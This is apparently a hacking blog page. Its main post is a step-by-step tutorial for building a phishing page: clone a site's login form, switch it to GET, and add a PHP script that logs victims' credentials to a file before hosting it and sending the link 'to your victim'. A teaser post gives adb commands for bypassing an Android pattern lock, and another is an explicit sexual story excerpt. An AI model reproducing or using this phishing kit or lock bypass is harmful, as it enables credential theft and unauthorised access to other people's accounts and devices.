Skip to main content

       How To Make A Fake Login Page

EthicabotNovember 16, 2019

This post is For Educational purposes.



Hello this is a tutorial on how to make a fake login page.

Before we start I want to say that I did not make this guide and am simply sharing it here.

1- open up the site that you want to make the fake page from it, after the load right click and save the page as “web page complete”

2- now open that page with notepad, and press control+F to access search bar, and then search “login”

3- behind the word “login” it’s written .action, we don’t need those so delete everything behind the login (this tutorial is for PHP, may you see login.aspx)

4- if you saw method=”post” change it to method=”GET” 

5- ok now save it as .html

6- open a new notepad, and write this commands on it:<?php

header (‘Location:target.com’);

$handle = fopen(“log.txt”, “a”);

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

7- instead of Location: target.com, write your login page address!

8- now save this as Login.PHP

9- go to website’s that offer free hosts

https://www.000webho…ree-php-hosti get

https://infinityfree.net/

10- make an account, get your host and upload both of files!

11- after that you only need to give your HTML link to your victim!

12- if he opened and write his Login information you can access it!

13- if you look at PHP source, you can see log.txt that’s where your victim info’s saved.

This Thread is just for raising your information, and I do not accept responsibility for your misuse. ENJOY








How To Make A Fake Login Page

Comments

Popular posts from this blog

HOW TO UNLOCK LOCK PATTERN USING COMMAND PROMPT

​ Hello guys Hope you good,I came across this and I wish to share this for education and research purpose only. I m not responsible for any misuse of this knowledge,please guys,this post is to enlighten you that pattern are low in security when it comes to protecting personal data on your mobile phones. Most preferred high security locks are: PIN,PASSWORD . 🔴Steps:-    Connect your android phone to your computer.   Open Commande prompt administrator. Now in command prompt window type following code carefully  adb shell cd/data/data/com.android.providers.settings/databases sqlites settings.db  update system set value=0 where name=’lockpatternautolock’; update system set value=0 where name=’lockscreen.lockedoutpermanently’; .quit   Now you will see some screen as shown below and then you can reboot your phone and now when your android starts again, then try unlocking it using any random pattern and it will unlock and work pretty fine. If you face any proble...

Ethicalbot

  Ethical h acking  Types of Attacks o Types of Attacks on a System o Operating System Attacks  o Misconfiguration Attacks  o Application-Level Attacks o Examples of Application-Level Attacks o Shrink Wrap Code Attacks  Information Security Controls o Why Ethical Hacking is Necessary o Scope and Limitations of Ethical Hacking o Skills of an Ethical Hacker o Defense in Depth o Incident Management Process o Information Security Policies o Classification of Security Policies o Structure and Contents of Security Policies o Types of Security Policies o Steps to Create and Implement Security Policies o Examples of Security Policies o Vulnerability Research o Vulnerability Research Websites o What Is Penetration Testing? o Why Penetration Testing o Penetration Testing Methodology. Guys i believe if you build on these basics you will not be a victim of any hack,get acquainted with types of attack so you will know an...

My confession (final part)

Dont do it, my mind whispered  "madam " he said, bringing me out of my suspense  "Juliet sent me to you" he said.  Pls just call me damilola " I added  "Ok" he replied  He resumed work that day to be honest I couldn't just concentrate at work  That day the urge was still driving me me crazy  Immediately I closed I rushed out of my office I did not want to see his face again before something else would happen Immediately I got home, the first person I met was my Gardner  "Musa come to my room right now" I ordered "Madam, any wahala? " he asked I didn't even answer him as I left and headed to my room.  Immediately he entered, the deed began as I moaned quietly. I gave him a blow job as he sucked my boobs.  Damn, it was awesome you needed to have seen the way this idiot romanced me badly without fear. We had sex for about 15 minutes before we stopped.  He was sweating all over. I ordered him out of my room as I let...